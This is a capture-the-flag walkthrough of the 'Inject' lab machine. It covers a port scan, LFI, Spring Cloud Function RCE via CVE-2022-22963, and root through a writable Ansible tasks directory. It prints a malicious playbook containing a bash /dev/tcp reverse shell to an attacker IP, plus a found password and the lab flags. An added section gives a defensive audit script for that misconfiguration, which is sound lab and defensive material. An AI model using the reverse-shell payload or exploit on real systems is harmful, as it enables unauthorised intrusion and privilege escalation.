[Meachines] [Easy] Inject LFI && Spring Cloud RCE+Ansible playbook Privilege Escalation

2025-02-26

Information Gathering

IP Address      Open Ports
10.10.11.204    TCP: 22, 8080

$ ip='10.10.11.204'; itf='tun0'
  if nmap -Pn -sn "$ip" | grep -q "Host is up"; then
    echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"
    ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//')
    if [ -n "$ports" ]; then
      echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"
      nmap -Pn -sV -sC -p "$ports" "$ip"
    else
      echo -e "\e[31m[!] No open ports found on $ip.\e[0m"
    fi
  else
    echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"
  fi

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 caf10c515a596277f0a80c5c7c8ddaf8 (RSA)
|   256 d51c81c97b076b1cc1b429254b52219f (ECDSA)
|_  256 db1d8ceb9472b0d3ed44b96c93a7f91d (ED25519)
8080/tcp open  nagios-nsca Nagios NSCA
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

LFI && Spring Cloud RCE

http://10.10.11.204:8080


$ feroxbuster -u 'http://10.10.11.204:8080/'


http://10.10.11.204:8080/upload


https://www.cvedetails.com/cve/CVE-2022-22963/

https://github.com/J0ey17/CVE-2022-22963_Reverse-Shell-Exploit

$ python3 exp.py -u 'http://10.10.11.204:8080'


https://github.com/MartinxMax/trp00f

$ grep -iR password 2>/dev/null


Username: phil

Password: DocPhillovestoInject123

User.txt

94e7dcdca61b2d4d6d8256039e213074

Privilege Escalation: Ansible playbook

Monitoring with pspy64 shows that /usr/local/bin/ansible-parallel runs the tasks in /opt/automation/tasks/*.yml.

The playbook_1.yml file is an Ansible playbook that ensures the webapp service is running on localhost and is enabled at boot.


Write a malicious YAML payload to

/opt/automation/tasks/playbook_2.yml

- hosts: localhost
  tasks:
  - name: Checking webapp service
    shell: bash -c 'bash -i >& /dev/tcp/10.10.16.28/443 0>&1'


Root.txt

5e375fdba1d1771e97cf1af837801f0e
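
Added example, not part of the original write-up: the escalation above works because a non-privileged user can place a file in a directory whose *.yml files ansible-parallel executes. The function below audits such a directory for that condition. The name audit_playbook_dir, the default owner root, and the assumption that write access comes from group/other mode bits are illustrative and not taken from the page.

```shell
#!/bin/sh
# Added example: audit a directory of playbooks that a privileged scheduler
# runs (on this box, /opt/automation/tasks).
# Assumption: the scheduler runs as the account given in $2 (default: root),
# so everything it loads should be owned by that account and writable by
# nobody else.

# Usage: audit_playbook_dir DIR [OWNER]
# Prints one finding per line. Returns 1 if there are findings, 0 if clean.
audit_playbook_dir() {
    dir=$1
    owner=${2:-root}
    findings=$(
        # Directories or playbooks writable through group/other mode bits:
        # any member of that group can add or edit a file the scheduler runs.
        find "$dir" \( -type d -o -name '*.yml' -o -name '*.yaml' \) \
            \( -perm -020 -o -perm -002 \) -print | sed 's/^/WRITABLE /'
        # Directories or playbooks owned by someone other than the account
        # the scheduler runs as.
        find "$dir" \( -type d -o -name '*.yml' -o -name '*.yaml' \) \
            ! -user "$owner" -print | sed 's/^/FOREIGN-OWNER /'
    )
    if [ -n "$findings" ]; then
        printf '%s\n' "$findings"
        return 1
    fi
    return 0
}

# Example invocation on a host (uncomment to use):
# audit_playbook_dir /opt/automation/tasks root
```

A clean result still leaves parent directories to check: write access to /opt/automation itself would allow replacing the tasks directory.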

